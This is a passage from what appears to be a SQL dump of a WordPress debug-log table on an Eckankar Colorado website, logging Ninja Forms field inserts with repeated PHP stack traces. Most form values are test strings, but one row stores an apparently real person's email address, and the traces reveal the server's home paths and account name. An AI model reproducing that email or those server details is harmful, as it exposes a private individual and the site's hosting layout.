162776',NULL,NULL),(100,50,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(101,51,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162776, \'_field_307\', \'Youth and family testing 5.....................\')',NULL,NULL),(102,51,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(103,52,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 162777',NULL,NULL),(104,52,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(105,53,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162777, \'_field_302\', \'TEST----6\')',NULL,NULL),(106,53,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(107,54,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 162777',NULL,NULL),(108,54,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(109,55,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162777, \'_field_303\', \'TESTING------6\')',NULL,NULL),(110,55,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(111,56,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 162777',NULL,NULL),(112,56,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(113,57,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162777, \'_field_304\', \'choll.03@comcast.net\')',NULL,NULL),(114,57,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(115,58,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 162777',NULL,NULL),(116,58,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(117,59,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162777, \'_field_306\', \'TEST....6\')',NULL,NULL),(118,59,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"